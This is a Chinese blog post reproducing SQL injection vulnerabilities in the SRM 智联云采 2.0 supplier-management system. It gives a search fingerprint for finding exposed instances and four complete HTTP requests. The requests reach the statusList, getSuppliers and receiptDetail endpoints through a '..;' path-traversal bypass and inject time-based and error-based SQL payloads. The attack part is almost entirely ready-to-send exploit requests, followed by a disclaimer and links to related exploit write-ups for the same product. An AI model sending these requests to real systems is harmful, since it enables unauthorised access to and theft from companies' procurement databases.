【漏洞复现】|SRM智联云采系统多个接口存在SQL注入漏洞

已于 2024-11-24 19:27:21 修改
阅读量644 收藏 6
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: sql 数据库 网络安全 笔记
于 2024-11-24 19:14:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IDHALASHAO/article/details/144011189

漏洞描述

智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。

资产概要  

title=="SRM 2.0"

漏洞复现  

  • statusList存在SQL注入

POST /adpweb/static/..;/a/sys/sysMessage/statusList?companyName=1&officeName=1&orderBy=1&receiverName=1&sourceMessageId=1&delStatus=1%20AND%20(SELECT%207104%20FROM%20(SELECT(SLEEP(3)))xZoa) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
  • getSuppliers存在SQL注入
POST /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=%27+AND+%28SELECT+1312+FROM+%28SELECT%28SLEEP%283%29%29%29HckV%29--+HyuV HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
  • inquiry存在SQL注入
GET /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=1%27+AND+GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+md5%281234%29%29%2C0x7e%29%2C7973%29--+WkOF&name=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
  • receiptDetail存在SQL注入
POST /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

 图略.....

免责声明

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。 

智互联深圳科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
缘梦未来的博客
11-19 413
智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
智联云采 SRM2.0 多处 SQL注入漏洞复现
0xSec
11-21 640
智联云采 SRM2.0 quickReceiptDetail、statusList、receiptDetail、inquiry/getSuppliers等多个接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
智联云采 SRM2.0 testService SQL注入漏洞复现
0xSec
10-18 1209
由于智联云采 SRM2.0 testService 接口可未授权执行SQL语句,存在极大的安全风险,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
汉得SRM tomcat.jsp 登录绕过漏洞 复现
YingxueSec
09-27 1225
汉得SRM tomcat.jsp 登录绕过漏洞复现
某云彩SRM2.0任意文件下载漏洞
一个努力学习网安的小牛马
09-05 605
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。该系统download在接口存在任意文件下载漏洞
智联云采SRM2.0 testService SQL注入漏洞复现
iSee857的博客
10-22 692
‌ 该解决方案依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,规避供需风险,强化供应链整合能力,构建企业利益共同体‌。智联云采SRM2.0 testService 接口存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。最小权限原则:数据库账户应仅授予执行所需操作的最低权限,避免使用高权限账户连接数据库
智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现
网安小白
08-20 590
智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
SRM系统是什么?有什么作用?企业如何应用SRM系统?
BeWorkingMan的博客
05-17 2488
SRM:Supplier Relationship Management,供应商关系管理。SRM是一种致力于实现与供应商建立和维持长久、紧密伙伴关系的管理思想和软件技术的解决方案,实现从采购需求的下达、审批、招标以及后续的订单、发货、入库、对账、供应商准入、供应商绩效考核等全过程业务闭环。
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
weixin_54799594的博客
08-29 726
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
智联云采SRM2.0 身份认证绕过
iSee857的博客
09-03 450
智联云采SRM2.0存在身份认证绕过漏洞,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台。关闭外网访问权限 限制问题接口权限访问。
SRM2.0合同数量及金额订单管控-FS.docx
11-10
SRM2.0合同数量及金额订单管控-FS.docx
智联云采 SRM2.0 autologin 身份认证绕过漏洞复现
0xSec
09-02 667
由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
漏洞复现|智互联SRM智联云采系统quickReceiptDetail SQL注入漏洞
摘星怪sec的blog
11-22 528
深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。
然之协同系统漏洞利用汇总
vspiders的博客
03-21 4977
Author:Vspiders首发地址:https://xianzhi.aliyun.com/forum/topic/2135前言前段时间在做然之协同系统代码审计,这里做个简单的总结。第一弹:SQL注入漏洞0x01 注入漏洞分析问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中,public function orderBy($order) { i...
大华供应链管理平台_files_锦江全球采购平台SRM系统2.0版本上线 打造更智能的供应链...
weixin_39959569的博客
11-24 1117
近期,由甄云科技携手全球知名酒店品牌供应链企业上海锦江联采供应链有限公司,共同打造的SRM2.0项目,在双方的不懈努力下,成功上线,意味着上海锦江联采供应链有限公司正式迈入采购数字化新时代。锦江全球采购平台上海锦江联采供应链有限公司以下又称锦江全球采购平台或GPP(Global Purchasing Platform),由锦江投资、锦江酒店、红星美凯龙等共同投资成立,注册资金30000万元人民币,...
汉得SRM云平台 存在XML实体注入漏洞
最新发布
03-12
嗯,用户问的是汉得SRM云平台的XML实体注入漏洞的解决方案和详情。首先,我需要先了解XML实体注入漏洞的基本概念,然后结合汉得SRM的具体情况来分析可能的原因和解决方法。 XML实体注入漏洞通常发生在解析用户提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值